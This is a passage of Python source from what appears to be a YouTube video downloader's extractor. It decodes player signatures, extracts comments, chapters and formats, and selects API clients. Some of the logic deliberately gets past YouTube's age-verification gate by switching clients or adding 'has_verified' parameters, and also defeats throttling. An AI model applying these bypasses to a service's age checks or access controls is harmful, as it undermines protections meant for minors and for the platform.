'https://www.youtube.com/iframe_api',
note='Downloading iframe API JS', video_id=video_id, fatal=fatal)
if res:
player_version = self._search_regex(
r'player\\?/([0-9a-fA-F]{8})\\?/', res, 'player version', fatal=fatal)
if player_version:
return f'https://www.youtube.com/s/player/{player_version}/player_ias.vflset/en_US/base.js'
def _signature_cache_id(self, example_sig):
""" Return a string representation of a signature """
return '.'.join(compat_str(len(part)) for part in example_sig.split('.'))
@classmethod
def _extract_player_info(cls, player_url):
for player_re in cls._PLAYER_INFO_RE:
id_m = re.search(player_re, player_url)
if id_m:
break
else:
raise ExtractorError('Cannot identify player %r' % player_url)
return id_m.group('id')
def _load_player(self, video_id, player_url, fatal=True):
player_id = self._extract_player_info(player_url)
if player_id not in self._code_cache:
code = self._download_webpage(
player_url, video_id, fatal=fatal,
note='Downloading player ' + player_id,
errnote='Download of %s failed' % player_url)
if code:
self._code_cache[player_id] = code
return self._code_cache.get(player_id)
def _extract_signature_function(self, video_id, player_url, example_sig):
player_id = self._extract_player_info(player_url)
# Read from filesystem cache
func_id = 'js_%s_%s' % (
player_id, self._signature_cache_id(example_sig))
assert os.path.basename(func_id) == func_id
cache_spec = self._downloader.cache.load('youtube-sigfuncs', func_id)
if cache_spec is not None:
return lambda s: ''.join(s[i] for i in cache_spec)
code = self._load_player(video_id, player_url)
if code:
res = self._parse_sig_js(code)
test_string = ''.join(map(compat_chr, range(len(example_sig))))
cache_res = res(test_string)
cache_spec = [ord(c) for c in cache_res]
self._downloader.cache.store('youtube-sigfuncs', func_id, cache_spec)
return res
def _print_sig_code(self, func, example_sig):
if not self.get_param('youtube_print_sig_code'):
return
def gen_sig_code(idxs):
def _genslice(start, end, step):
starts = '' if start == 0 else str(start)
ends = (':%d' % (end + step)) if end + step >= 0 else ':'
steps = '' if step == 1 else (':%d' % step)
return 's[%s%s%s]' % (starts, ends, steps)
step = None
# Quelch pyflakes warnings - start will be set when step is set
start = '(Never used)'
for i, prev in zip(idxs[1:], idxs[:-1]):
if step is not None:
if i - prev == step:
continue
yield _genslice(start, prev, step)
step = None
continue
if i - prev in [-1, 1]:
step = i - prev
start = prev
continue
else:
yield 's[%d]' % prev
if step is None:
yield 's[%d]' % i
else:
yield _genslice(start, i, step)
test_string = ''.join(map(compat_chr, range(len(example_sig))))
cache_res = func(test_string)
cache_spec = [ord(c) for c in cache_res]
expr_code = ' + '.join(gen_sig_code(cache_spec))
signature_id_tuple = '(%s)' % (
', '.join(compat_str(len(p)) for p in example_sig.split('.')))
code = ('if tuple(len(p) for p in s.split(\'.\')) == %s:\n'
' return %s\n') % (signature_id_tuple, expr_code)
self.to_screen('Extracted signature function:\n' + code)
def _parse_sig_js(self, jscode):
funcname = self._search_regex(
(r'\b[cs]\s*&&\s*[adf]\.set\([^,]+\s*,\s*encodeURIComponent\s*\(\s*(?P<sig>[a-zA-Z0-9$]+)\(',
r'\b[a-zA-Z0-9]+\s*&&\s*[a-zA-Z0-9]+\.set\([^,]+\s*,\s*encodeURIComponent\s*\(\s*(?P<sig>[a-zA-Z0-9$]+)\(',
r'\bm=(?P<sig>[a-zA-Z0-9$]{2,})\(decodeURIComponent\(h\.s\)\)',
r'\bc&&\(c=(?P<sig>[a-zA-Z0-9$]{2,})\(decodeURIComponent\(c\)\)',
r'(?:\b|[^a-zA-Z0-9$])(?P<sig>[a-zA-Z0-9$]{2,})\s*=\s*function\(\s*a\s*\)\s*{\s*a\s*=\s*a\.split\(\s*""\s*\);[a-zA-Z0-9$]{2}\.[a-zA-Z0-9$]{2}\(a,\d+\)',
r'(?:\b|[^a-zA-Z0-9$])(?P<sig>[a-zA-Z0-9$]{2,})\s*=\s*function\(\s*a\s*\)\s*{\s*a\s*=\s*a\.split\(\s*""\s*\)',
r'(?P<sig>[a-zA-Z0-9$]+)\s*=\s*function\(\s*a\s*\)\s*{\s*a\s*=\s*a\.split\(\s*""\s*\)',
# Obsolete patterns
r'(["\'])signature\1\s*,\s*(?P<sig>[a-zA-Z0-9$]+)\(',
r'\.sig\|\|(?P<sig>[a-zA-Z0-9$]+)\(',
r'yt\.akamaized\.net/\)\s*\|\|\s*.*?\s*[cs]\s*&&\s*[adf]\.set\([^,]+\s*,\s*(?:encodeURIComponent\s*\()?\s*(?P<sig>[a-zA-Z0-9$]+)\(',
r'\b[cs]\s*&&\s*[adf]\.set\([^,]+\s*,\s*(?P<sig>[a-zA-Z0-9$]+)\(',
r'\b[a-zA-Z0-9]+\s*&&\s*[a-zA-Z0-9]+\.set\([^,]+\s*,\s*(?P<sig>[a-zA-Z0-9$]+)\(',
r'\bc\s*&&\s*a\.set\([^,]+\s*,\s*\([^)]*\)\s*\(\s*(?P<sig>[a-zA-Z0-9$]+)\(',
r'\bc\s*&&\s*[a-zA-Z0-9]+\.set\([^,]+\s*,\s*\([^)]*\)\s*\(\s*(?P<sig>[a-zA-Z0-9$]+)\(',
r'\bc\s*&&\s*[a-zA-Z0-9]+\.set\([^,]+\s*,\s*\([^)]*\)\s*\(\s*(?P<sig>[a-zA-Z0-9$]+)\('),
jscode, 'Initial JS player signature function name', group='sig')
jsi = JSInterpreter(jscode)
initial_function = jsi.extract_function(funcname)
return lambda s: initial_function([s])
def _decrypt_signature(self, s, video_id, player_url):
"""Turn the encrypted s field into a working signature"""
if player_url is None:
raise ExtractorError('Cannot decrypt signature without player_url')
try:
player_id = (player_url, self._signature_cache_id(s))
if player_id not in self._player_cache:
func = self._extract_signature_function(
video_id, player_url, s
)
self._player_cache[player_id] = func
func = self._player_cache[player_id]
self._print_sig_code(func, s)
return func(s)
except Exception as e:
raise ExtractorError('Signature extraction failed: ' + traceback.format_exc(), cause=e)
def _decrypt_nsig(self, s, video_id, player_url):
"""Turn the encrypted n field into a working signature"""
if player_url is None:
raise ExtractorError('Cannot decrypt nsig without player_url')
player_url = urljoin('https://www.youtube.com', player_url)
sig_id = ('nsig_value', s)
if sig_id in self._player_cache:
return self._player_cache[sig_id]
try:
player_id = ('nsig', player_url)
if player_id not in self._player_cache:
self._player_cache[player_id] = self._extract_n_function(video_id, player_url)
func = self._player_cache[player_id]
self._player_cache[sig_id] = func(s)
self.write_debug(f'Decrypted nsig {s} => {self._player_cache[sig_id]}')
return self._player_cache[sig_id]
except Exception as e:
raise ExtractorError(traceback.format_exc(), cause=e, video_id=video_id)
def _extract_n_function_name(self, jscode):
nfunc, idx = self._search_regex(
r'\.get\("n"\)\)&&\(b=(?P<nfunc>[a-zA-Z0-9$]+)(?:\[(?P<idx>\d+)\])?\([a-zA-Z0-9]\)',
jscode, 'Initial JS player n function name', group=('nfunc', 'idx'))
if not idx:
return nfunc
return json.loads(js_to_json(self._search_regex(
rf'var {re.escape(nfunc)}\s*=\s*(\[.+?\]);', jscode,
f'Initial JS player n function list ({nfunc}.{idx})')))[int(idx)]
def _extract_n_function(self, video_id, player_url):
player_id = self._extract_player_info(player_url)
func_code = self._downloader.cache.load('youtube-nsig', player_id)
if func_code:
jsi = JSInterpreter(func_code)
else:
jscode = self._load_player(video_id, player_url)
funcname = self._extract_n_function_name(jscode)
jsi = JSInterpreter(jscode)
func_code = jsi.extract_function_code(funcname)
self._downloader.cache.store('youtube-nsig', player_id, func_code)
if self.get_param('youtube_print_sig_code'):
self.to_screen(f'Extracted nsig function from {player_id}:\n{func_code[1]}\n')
return lambda s: jsi.extract_function_from_code(*func_code)([s])
def _extract_signature_timestamp(self, video_id, player_url, ytcfg=None, fatal=False):
"""
Extract signatureTimestamp (sts)
Required to tell API what sig/player version is in use.
"""
sts = None
if isinstance(ytcfg, dict):
sts = int_or_none(ytcfg.get('STS'))
if not sts:
# Attempt to extract from player
if player_url is None:
error_msg = 'Cannot extract signature timestamp without player_url.'
if fatal:
raise ExtractorError(error_msg)
self.report_warning(error_msg)
return
code = self._load_player(video_id, player_url, fatal=fatal)
if code:
sts = int_or_none(self._search_regex(
r'(?:signatureTimestamp|sts)\s*:\s*(?P<sts>[0-9]{5})', code,
'JS player signature timestamp', group='sts', fatal=fatal))
return sts
def _mark_watched(self, video_id, player_responses):
playback_url = get_first(
player_responses, ('playbackTracking', 'videostatsPlaybackUrl', 'baseUrl'),
expected_type=url_or_none)
if not playback_url:
self.report_warning('Unable to mark watched')
return
parsed_playback_url = compat_urlparse.urlparse(playback_url)
qs = compat_urlparse.parse_qs(parsed_playback_url.query)
# cpn generation algorithm is reverse engineered from base.js.
# In fact it works even with dummy cpn.
CPN_ALPHABET = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_'
cpn = ''.join((CPN_ALPHABET[random.randint(0, 256) & 63] for _ in range(0, 16)))
qs.update({
'ver': ['2'],
'cpn': [cpn],
})
playback_url = compat_urlparse.urlunparse(
parsed_playback_url._replace(query=compat_urllib_parse_urlencode(qs, True)))
self._download_webpage(
playback_url, video_id, 'Marking watched',
'Unable to mark watched', fatal=False)
@staticmethod
def _extract_urls(webpage):
# Embedded YouTube player
entries = [
unescapeHTML(mobj.group('url'))
for mobj in re.finditer(r'''(?x)
(?:
<iframe[^>]+?src=|
data-video-url=|
<embed[^>]+?src=|
embedSWF\(?:\s*|
<object[^>]+data=|
new\s+SWFObject\(
)
(["\'])
(?P<url>(?:https?:)?//(?:www\.)?youtube(?:-nocookie)?\.com/
(?:embed|v|p)/[0-9A-Za-z_-]{11}.*?)
\1''', webpage)]
# lazyYT YouTube embed
entries.extend(list(map(
unescapeHTML,
re.findall(r'class="lazyYT" data-youtube-id="([^"]+)"', webpage))))
# Wordpress "YouTube Video Importer" plugin
matches = re.findall(r'''(?x)<div[^>]+
class=(?P<q1>[\'"])[^\'"]*\byvii_single_video_player\b[^\'"]*(?P=q1)[^>]+
data-video_id=(?P<q2>[\'"])([^\'"]+)(?P=q2)''', webpage)
entries.extend(m[-1] for m in matches)
return entries
@staticmethod
def _extract_url(webpage):
urls = YoutubeIE._extract_urls(webpage)
return urls[0] if urls else None
@classmethod
def extract_id(cls, url):
mobj = re.match(cls._VALID_URL, url, re.VERBOSE)
if mobj is None:
raise ExtractorError('Invalid URL: %s' % url)
return mobj.group('id')
def _extract_chapters_from_json(self, data, duration):
chapter_list = traverse_obj(
data, (
'playerOverlays', 'playerOverlayRenderer', 'decoratedPlayerBarRenderer',
'decoratedPlayerBarRenderer', 'playerBar', 'chapteredPlayerBarRenderer', 'chapters'
), expected_type=list)
return self._extract_chapters(
chapter_list,
chapter_time=lambda chapter: float_or_none(
traverse_obj(chapter, ('chapterRenderer', 'timeRangeStartMillis')), scale=1000),
chapter_title=lambda chapter: traverse_obj(
chapter, ('chapterRenderer', 'title', 'simpleText'), expected_type=str),
duration=duration)
def _extract_chapters_from_engagement_panel(self, data, duration):
content_list = traverse_obj(
data,
('engagementPanels', ..., 'engagementPanelSectionListRenderer', 'content', 'macroMarkersListRenderer', 'contents'),
expected_type=list, default=[])
chapter_time = lambda chapter: parse_duration(self._get_text(chapter, 'timeDescription'))
chapter_title = lambda chapter: self._get_text(chapter, 'title')
return next((
filter(None, (
self._extract_chapters(
traverse_obj(contents, (..., 'macroMarkersListItemRenderer')),
chapter_time, chapter_title, duration)
for contents in content_list
))), [])
def _extract_chapters(self, chapter_list, chapter_time, chapter_title, duration):
chapters = []
last_chapter = {'start_time': 0}
for idx, chapter in enumerate(chapter_list or []):
title = chapter_title(chapter)
start_time = chapter_time(chapter)
if start_time is None:
continue
last_chapter['end_time'] = start_time
if start_time < last_chapter['start_time']:
if idx == 1:
chapters.pop()
self.report_warning('Invalid start time for chapter "%s"' % last_chapter['title'])
else:
self.report_warning(f'Invalid start time for chapter "{title}"')
continue
last_chapter = {'start_time': start_time, 'title': title}
chapters.append(last_chapter)
last_chapter['end_time'] = duration
return chapters
def _extract_yt_initial_variable(self, webpage, regex, video_id, name):
return self._parse_json(self._search_regex(
(r'%s\s*%s' % (regex, self._YT_INITIAL_BOUNDARY_RE),
regex), webpage, name, default='{}'), video_id, fatal=False)
def _extract_comment(self, comment_renderer, parent=None):
comment_id = comment_renderer.get('commentId')
if not comment_id:
return
text = self._get_text(comment_renderer, 'contentText')
# note: timestamp is an estimate calculated from the current time and time_text
timestamp, time_text = self._extract_time_text(comment_renderer, 'publishedTimeText')
author = self._get_text(comment_renderer, 'authorText')
author_id = try_get(comment_renderer,
lambda x: x['authorEndpoint']['browseEndpoint']['browseId'], compat_str)
votes = parse_count(try_get(comment_renderer, (lambda x: x['voteCount']['simpleText'],
lambda x: x['likeCount']), compat_str)) or 0
author_thumbnail = try_get(comment_renderer,
lambda x: x['authorThumbnail']['thumbnails'][-1]['url'], compat_str)
author_is_uploader = try_get(comment_renderer, lambda x: x['authorIsChannelOwner'], bool)
is_favorited = 'creatorHeart' in (try_get(
comment_renderer, lambda x: x['actionButtons']['commentActionButtonsRenderer'], dict) or {})
return {
'id': comment_id,
'text': text,
'timestamp': timestamp,
'time_text': time_text,
'like_count': votes,
'is_favorited': is_favorited,
'author': author,
'author_id': author_id,
'author_thumbnail': author_thumbnail,
'author_is_uploader': author_is_uploader,
'parent': parent or 'root'
}
def _comment_entries(self, root_continuation_data, ytcfg, video_id, parent=None, tracker=None):
get_single_config_arg = lambda c: self._configuration_arg(c, [''])[0]
def extract_header(contents):
_continuation = None
for content in contents:
comments_header_renderer = traverse_obj(content, 'commentsHeaderRenderer')
expected_comment_count = self._get_count(
comments_header_renderer, 'countText', 'commentsCount')
if expected_comment_count:
tracker['est_total'] = expected_comment_count
self.to_screen(f'Downloading ~{expected_comment_count} comments')
comment_sort_index = int(get_single_config_arg('comment_sort') != 'top') # 1 = new, 0 = top
sort_menu_item = try_get(
comments_header_renderer,
lambda x: x['sortMenu']['sortFilterSubMenuRenderer']['subMenuItems'][comment_sort_index], dict) or {}
sort_continuation_ep = sort_menu_item.get('serviceEndpoint') or {}
_continuation = self._extract_continuation_ep_data(sort_continuation_ep) or self._extract_continuation(sort_menu_item)
if not _continuation:
continue
sort_text = str_or_none(sort_menu_item.get('title'))
if not sort_text:
sort_text = 'top comments' if comment_sort_index == 0 else 'newest first'
self.to_screen('Sorting comments by %s' % sort_text.lower())
break
return _continuation
def extract_thread(contents):
if not parent:
tracker['current_page_thread'] = 0
for content in contents:
if not parent and tracker['total_parent_comments'] >= max_parents:
yield
comment_thread_renderer = try_get(content, lambda x: x['commentThreadRenderer'])
comment_renderer = get_first(
(comment_thread_renderer, content), [['commentRenderer', ('comment', 'commentRenderer')]],
expected_type=dict, default={})
comment = self._extract_comment(comment_renderer, parent)
if not comment:
continue
tracker['running_total'] += 1
tracker['total_reply_comments' if parent else 'total_parent_comments'] += 1
yield comment
# Attempt to get the replies
comment_replies_renderer = try_get(
comment_thread_renderer, lambda x: x['replies']['commentRepliesRenderer'], dict)
if comment_replies_renderer:
tracker['current_page_thread'] += 1
comment_entries_iter = self._comment_entries(
comment_replies_renderer, ytcfg, video_id,
parent=comment.get('id'), tracker=tracker)
for reply_comment in itertools.islice(comment_entries_iter, min(max_replies_per_thread, max(0, max_replies - tracker['total_reply_comments']))):
yield reply_comment
# Keeps track of counts across recursive calls
if not tracker:
tracker = dict(
running_total=0,
est_total=0,
current_page_thread=0,
total_parent_comments=0,
total_reply_comments=0)
# TODO: Deprecated
# YouTube comments have a max depth of 2
max_depth = int_or_none(get_single_config_arg('max_comment_depth'))
if max_depth:
self._downloader.deprecation_warning(
'[youtube] max_comment_depth extractor argument is deprecated. Set max replies in the max-comments extractor argument instead.')
if max_depth == 1 and parent:
return
max_comments, max_parents, max_replies, max_replies_per_thread, *_ = map(
lambda p: int_or_none(p, default=sys.maxsize), self._configuration_arg('max_comments', ) + [''] * 4)
continuation = self._extract_continuation(root_continuation_data)
message = self._get_text(root_continuation_data, ('contents', ..., 'messageRenderer', 'text'), max_runs=1)
if message and not parent:
self.report_warning(message, video_id=video_id)
response = None
is_first_continuation = parent is None
for page_num in itertools.count(0):
if not continuation:
break
headers = self.generate_api_headers(ytcfg=ytcfg, visitor_data=self._extract_visitor_data(response))
comment_prog_str = f"({tracker['running_total']}/{tracker['est_total']})"
if page_num == 0:
if is_first_continuation:
note_prefix = 'Downloading comment section API JSON'
else:
note_prefix = ' Downloading comment API JSON reply thread %d %s' % (
tracker['current_page_thread'], comment_prog_str)
else:
note_prefix = '%sDownloading comment%s API JSON page %d %s' % (
' ' if parent else '', ' replies' if parent else '',
page_num, comment_prog_str)
response = self._extract_response(
item_id=None, query=continuation,
ep='next', ytcfg=ytcfg, headers=headers, note=note_prefix,
check_get_keys='onResponseReceivedEndpoints')
continuation_contents = traverse_obj(
response, 'onResponseReceivedEndpoints', expected_type=list, default=[])
continuation = None
for continuation_section in continuation_contents:
continuation_items = traverse_obj(
continuation_section,
(('reloadContinuationItemsCommand', 'appendContinuationItemsAction'), 'continuationItems'),
get_all=False, expected_type=list) or []
if is_first_continuation:
continuation = extract_header(continuation_items)
is_first_continuation = False
if continuation:
break
continue
for entry in extract_thread(continuation_items):
if not entry:
return
yield entry
continuation = self._extract_continuation({'contents': continuation_items})
if continuation:
break
def _get_comments(self, ytcfg, video_id, contents, webpage):
"""Entry for comment extraction"""
def _real_comment_extract(contents):
renderer = next((
item for item in traverse_obj(contents, (..., 'itemSectionRenderer'), default={})
if item.get('sectionIdentifier') == 'comment-item-section'), None)
yield from self._comment_entries(renderer, ytcfg, video_id)
max_comments = int_or_none(self._configuration_arg('max_comments', [''])[0])
return itertools.islice(_real_comment_extract(contents), 0, max_comments)
@staticmethod
def _get_checkok_params():
return {'contentCheckOk': True, 'racyCheckOk': True}
@classmethod
def _generate_player_context(cls, sts=None):
context = {
'html5Preference': 'HTML5_PREF_WANTS',
}
if sts is not None:
context['signatureTimestamp'] = sts
return {
'playbackContext': {
'contentPlaybackContext': context
},
**cls._get_checkok_params()
}
@staticmethod
def _is_agegated(player_response):
if traverse_obj(player_response, ('playabilityStatus', 'desktopLegacyAgeGateReason')):
return True
reasons = traverse_obj(player_response, ('playabilityStatus', ('status', 'reason')), default=[])
AGE_GATE_REASONS = (
'confirm your age', 'age-restricted', 'inappropriate', # reason
'age_verification_required', 'age_check_required', # status
)
return any(expected in reason for expected in AGE_GATE_REASONS for reason in reasons)
@staticmethod
def _is_unplayable(player_response):
return traverse_obj(player_response, ('playabilityStatus', 'status')) == 'UNPLAYABLE'
def _extract_player_response(self, client, video_id, master_ytcfg, player_ytcfg, player_url, initial_pr):
session_index = self._extract_session_index(player_ytcfg, master_ytcfg)
syncid = self._extract_account_syncid(player_ytcfg, master_ytcfg, initial_pr)
sts = self._extract_signature_timestamp(video_id, player_url, master_ytcfg, fatal=False) if player_url else None
headers = self.generate_api_headers(
ytcfg=player_ytcfg, account_syncid=syncid, session_index=session_index, default_client=client)
yt_query = {'videoId': video_id}
yt_query.update(self._generate_player_context(sts))
return self._extract_response(
item_id=video_id, ep='player', query=yt_query,
ytcfg=player_ytcfg, headers=headers, fatal=True,
default_client=client,
note='Downloading %s player API JSON' % client.replace('_', ' ').strip()
) or None
def _get_requested_clients(self, url, smuggled_data):
requested_clients = []
default = ['android', 'web']
allowed_clients = sorted(
[client for client in INNERTUBE_CLIENTS.keys() if client[:1] != '_'],
key=lambda client: INNERTUBE_CLIENTS[client]['priority'], reverse=True)
for client in self._configuration_arg('player_client'):
if client in allowed_clients:
requested_clients.append(client)
elif client == 'default':
requested_clients.extend(default)
elif client == 'all':
requested_clients.extend(allowed_clients)
else:
self.report_warning(f'Skipping unsupported client {client}')
if not requested_clients:
requested_clients = default
if smuggled_data.get('is_music_url') or self.is_music_url(url):
requested_clients.extend(
f'{client}_music' for client in requested_clients if f'{client}_music' in INNERTUBE_CLIENTS)
return orderedSet(requested_clients)
def _extract_player_ytcfg(self, client, video_id):
url = {
'web_music': 'https://music.youtube.com',
'web_embedded': f'https://www.youtube.com/embed/{video_id}?html5=1'
}.get(client)
if not url:
return {}
webpage = self._download_webpage(url, video_id, fatal=False, note='Downloading %s config' % client.replace('_', ' ').strip())
return self.extract_ytcfg(video_id, webpage) or {}
def _extract_player_responses(self, clients, video_id, webpage, master_ytcfg):
initial_pr = None
if webpage:
initial_pr = self._extract_yt_initial_variable(
webpage, self._YT_INITIAL_PLAYER_RESPONSE_RE,
video_id, 'initial player response')
all_clients = set(clients)
clients = clients[::-1]
prs = []
def append_client(*client_names):
""" Append the first client name that exists but not already used """
for client_name in client_names:
actual_client = _split_innertube_client(client_name)[0]
if actual_client in INNERTUBE_CLIENTS:
if actual_client not in all_clients:
clients.append(client_name)
all_clients.add(actual_client)
return
# Android player_response does not have microFormats which are needed for
# extraction of some data. So we return the initial_pr with formats
# stripped out even if not requested by the user
# See: https://github.com/yt-dlp/yt-dlp/issues/501
if initial_pr:
pr = dict(initial_pr)
pr['streamingData'] = None
prs.append(pr)
last_error = None
tried_iframe_fallback = False
player_url = None
while clients:
client, base_client, variant = _split_innertube_client(clients.pop())
player_ytcfg = master_ytcfg if client == 'web' else {}
if 'configs' not in self._configuration_arg('player_skip'):
player_ytcfg = self._extract_player_ytcfg(client, video_id) or player_ytcfg
player_url = player_url or self._extract_player_url(master_ytcfg, player_ytcfg, webpage=webpage)
require_js_player = self._get_default_ytcfg(client).get('REQUIRE_JS_PLAYER')
if 'js' in self._configuration_arg('player_skip'):
require_js_player = False
player_url = None
if not player_url and not tried_iframe_fallback and require_js_player:
player_url = self._download_player_url(video_id)
tried_iframe_fallback = True
try:
pr = initial_pr if client == 'web' and initial_pr else self._extract_player_response(
client, video_id, player_ytcfg or master_ytcfg, player_ytcfg, player_url if require_js_player else None, initial_pr)
except ExtractorError as e:
if last_error:
self.report_warning(last_error)
last_error = e
continue
if pr:
prs.append(pr)
# creator clients can bypass AGE_VERIFICATION_REQUIRED if logged in
if variant == 'embedded' and self._is_unplayable(pr) and self.is_authenticated:
append_client(f'{base_client}_creator')
elif self._is_agegated(pr):
if variant == 'tv_embedded':
append_client(f'{base_client}_embedded')
elif not variant:
append_client(f'tv_embedded.{base_client}', f'{base_client}_embedded')
if last_error:
if not len(prs):
raise last_error
self.report_warning(last_error)
return prs, player_url
def _extract_formats(self, streaming_data, video_id, player_url, is_live, duration):
itags, stream_ids = {}, []
itag_qualities, res_qualities = {}, {}
q = qualities([
# Normally tiny is the smallest video-only formats. But
# audio-only formats with unknown quality may get tagged as tiny
'tiny',
'audio_quality_ultralow', 'audio_quality_low', 'audio_quality_medium', 'audio_quality_high', # Audio only formats
'small', 'medium', 'large', 'hd720', 'hd1080', 'hd1440', 'hd2160', 'hd2880', 'highres'
])
streaming_formats = traverse_obj(streaming_data, (..., ('formats', 'adaptiveFormats'), ...), default=[])
for fmt in streaming_formats:
if fmt.get('targetDurationSec'):
continue
itag = str_or_none(fmt.get('itag'))
audio_track = fmt.get('audioTrack') or {}
stream_id = '%s.%s' % (itag or '', audio_track.get('id', ''))
if stream_id in stream_ids:
continue
quality = fmt.get('quality')
height = int_or_none(fmt.get('height'))
if quality == 'tiny' or not quality:
quality = fmt.get('audioQuality', '').lower() or quality
# The 3gp format (17) in android client has a quality of "small",
# but is actually worse than other formats
if itag == '17':
quality = 'tiny'
if quality:
if itag:
itag_qualities[itag] = quality
if height:
res_qualities[height] = quality
# FORMAT_STREAM_TYPE_OTF(otf=1) requires downloading the init fragment
# (adding `&sq=0` to the URL) and parsing emsg box to determine the
# number of fragment that would subsequently requested with (`&sq=N`)
if fmt.get('type') == 'FORMAT_STREAM_TYPE_OTF':
continue
fmt_url = fmt.get('url')
if not fmt_url:
sc = compat_parse_qs(fmt.get('signatureCipher'))
fmt_url = url_or_none(try_get(sc, lambda x: x['url'][0]))
encrypted_sig = try_get(sc, lambda x: x['s'][0])
if not (sc and fmt_url and encrypted_sig):
continue
if not player_url:
continue
signature = self._decrypt_signature(sc['s'][0], video_id, player_url)
sp = try_get(sc, lambda x: x['sp'][0]) or 'signature'
fmt_url += '&' + sp + '=' + signature
query = parse_qs(fmt_url)
throttled = False
if query.get('n'):
try:
fmt_url = update_url_query(fmt_url, {
'n': self._decrypt_nsig(query['n'][0], video_id, player_url)})
except ExtractorError as e:
self.report_warning(
f'nsig extraction failed: You may experience throttling for some formats\n'
f'n = {query["n"][0]} ; player = {player_url}\n{e}', only_once=True)
throttled = True
if itag:
itags[itag] = 'https'
stream_ids.append(stream_id)
tbr = float_or_none(fmt.get('averageBitrate') or fmt.get('bitrate'), 1000)
language_preference = (
10 if audio_track.get('audioIsDefault') and 10
else -10 if 'descriptive' in (audio_track.get('displayName') or '').lower() and -10
else -1)
# Some formats may have much smaller duration than others (possibly damaged during encoding)
# Eg: 2-nOtRESiUc Ref: https://github.com/yt-dlp/yt-dlp/issues/2823
# Make sure to avoid false positives with small duration differences.
# Eg: __2ABJjxzNo, ySuUZEjARPY
is_damaged = try_get(fmt, lambda x: float(x['approxDurationMs']) / duration < 500)
if is_damaged:
self.report_warning(f'{video_id}: Some formats are possibly damaged. They will be deprioritized', only_once=True)
dct = {
'asr': int_or_none(fmt.get('audioSampleRate')),
'filesize': int_or_none(fmt.get('contentLength')),
'format_id': itag,
'format_note': join_nonempty(
'%s%s' % (audio_track.get('displayName') or '',
' (default)' if language_preference > 0 else ''),
fmt.get('qualityLabel') or quality.replace('audio_quality_', ''),
throttled and 'THROTTLED', is_damaged and 'DAMAGED', delim=', '),
'source_preference': -10 if throttled else -1,
'fps': int_or_none(fmt.get('fps')) or None,
'height': height,
'quality': q(quality),
'has_drm': bool(fmt.get('drmFamilies')),
'tbr': tbr,
'url': fmt_url,
'width': int_or_none(fmt.get('width')),
'language': join_nonempty(audio_track.get('id', '').split('.')[0],
'desc' if language_preference < -1 else ''),
'language_preference': language_preference,
# Strictly de-prioritize damaged and 3gp formats
'preference': -10 if is_damaged else -2 if itag == '17' else None,
}
mime_mobj = re.match(
r'((?:[^/]+)/(?:[^;]+))(?:;\s*codecs="([^"]+)")?', fmt.get('mimeType') or '')
if mime_mobj:
dct['ext'] = mimetype2ext(mime_mobj.group(1))
dct.update(parse_codecs(mime_mobj.group(2)))
no_audio = dct.get('acodec') == 'none'
no_video = dct.get('vcodec') == 'none'
if no_audio:
dct['vbr'] = tbr
if no_video:
dct['abr'] = tbr
if no_audio or no_video:
dct['downloader_options'] = {
# Youtube throttles chunks >~10M
'http_chunk_size': 10485760,
}
if dct.get('ext'):
dct['container'] = dct['ext'] + '_dash'
yield dct
live_from_start = is_live and self.get_param('live_from_start')
skip_manifests = self._configuration_arg('skip')
if not self.get_param('youtube_include_hls_manifest', True):
skip_manifests.append('hls')
get_dash = 'dash' not in skip_manifests and (
not is_live or live_from_start or self._configuration_arg('include_live_dash'))
get_hls = not live_from_start and 'hls' not in skip_manifests
def process_manifest_format(f, proto, itag):
if itag in itags:
if itags[itag] == proto or f'{itag}-{proto}' in itags:
return False
itag = f'{itag}-{proto}'
if itag:
f['format_id'] = itag
itags[itag] = proto
f['quality'] = next((
q(qdict[val])
for val, qdict in ((f.get('format_id', '').split('-')[0], itag_qualities), (f.get('height'), res_qualities))
if val in qdict), -1)
return True
for sd in streaming_data:
hls_manifest_url = get_hls and sd.get('hlsManifestUrl')
if hls_manifest_url:
for f in self._extract_m3u8_formats(hls_manifest_url, video_id, 'mp4', fatal=False):
if process_manifest_format(f, 'hls', self._search_regex(
r'/itag/(\d+)', f['url'], 'itag', default=None)):
yield f
dash_manifest_url = get_dash and sd.get('dashManifestUrl')
if dash_manifest_url:
for f in self._extract_mpd_formats(dash_manifest_url, video_id, fatal=False):
if process_manifest_format(f, 'dash', f['format_id']):
f['filesize'] = int_or_none(self._search_regex(
r'/clen/(\d+)', f.get('fragment_base_url') or f['url'], 'file size', default=None))
if live_from_start:
f['is_from_start'] = True
yield f
def _extract_storyboard(self, player_responses, duration):
spec = get_first(
player_responses, ('storyboards', 'playerStoryboardSpecRenderer', 'spec'), default='').split('|')[::-1]
base_url = url_or_none(urljoin('https://i.ytimg.com/', spec.pop() or None))
if not base_url:
return
L = len(spec) - 1
for i, args in enumerate(spec):
args = args.split('#')
counts = list(map(int_or_none, args[:5]))
if len(args) != 8 or not all(counts):
self.report_warning(f'Malformed storyboard {i}: {"#".join(args)}{bug_reports_message()}')
continue
width, height, frame_count, cols, rows = counts
N, sigh = args[6:]
url = base_url.replace('$L', str(L - i)).replace('$N', N) + f'&sigh={sigh}'
fragment_count = frame_count / (cols * rows)
fragment_duration = duration / fragment_count
yield {
'format_id': f'sb{i}',
'format_note': 'storyboard',
'ext': 'mhtml',
'protocol': 'mhtml',
'acodec': 'none',
'vcodec': 'none',
'url': url,
'width': width,
'height': height,
'fragments': [{
'url': url.replace('$M', str(j)),
'duration': min(fragment_duration, duration - (j * fragment_duration)),
} for j in range(math.ceil(fragment_count))],
}
def _download_player_responses(self, url, smuggled_data, video_id, webpage_url):
webpage = None
if 'webpage' not in self._configuration_arg('player_skip'):
webpage = self._download_webpage(
webpage_url + '&bpctr=9999999999&has_verified=1', video_id, fatal=False)
master_ytcfg = self.extract_ytcfg(video_id, webpage) or self._get_default_ytcfg()
player_responses, player_url = self._extract_player_responses(
self._get_requested_clients(url, smuggled_data),
video_id, webpage, master_ytcfg)
return webpage, master_ytcfg, player_responses, player_url
def _list_formats(self, video_id, microformats, video_details, player_responses, player_url, duration=None):
live_broadcast_details = traverse_obj(microformats, (..., 'liveBroadcastDetails'))
is_live = get_first(video_details, 'isLive')
if is_live is None:
is_live = get_first(live_broadcast_details, 'isLiveNow')
streaming_data = traverse_obj(player_responses, (..., 'streamingData'), default=[])
formats = list(self._extract_formats(streaming_data, video_id, player_url, is_live, duration))
return live_broadcast_details, is_live, streaming_data, formats
def _real_extract(self, url):
url, smuggled_data = unsmuggle_url(url, {})
video_id = self._match_id(url)
base_url = self.http_scheme() + '//www.youtube.com/'
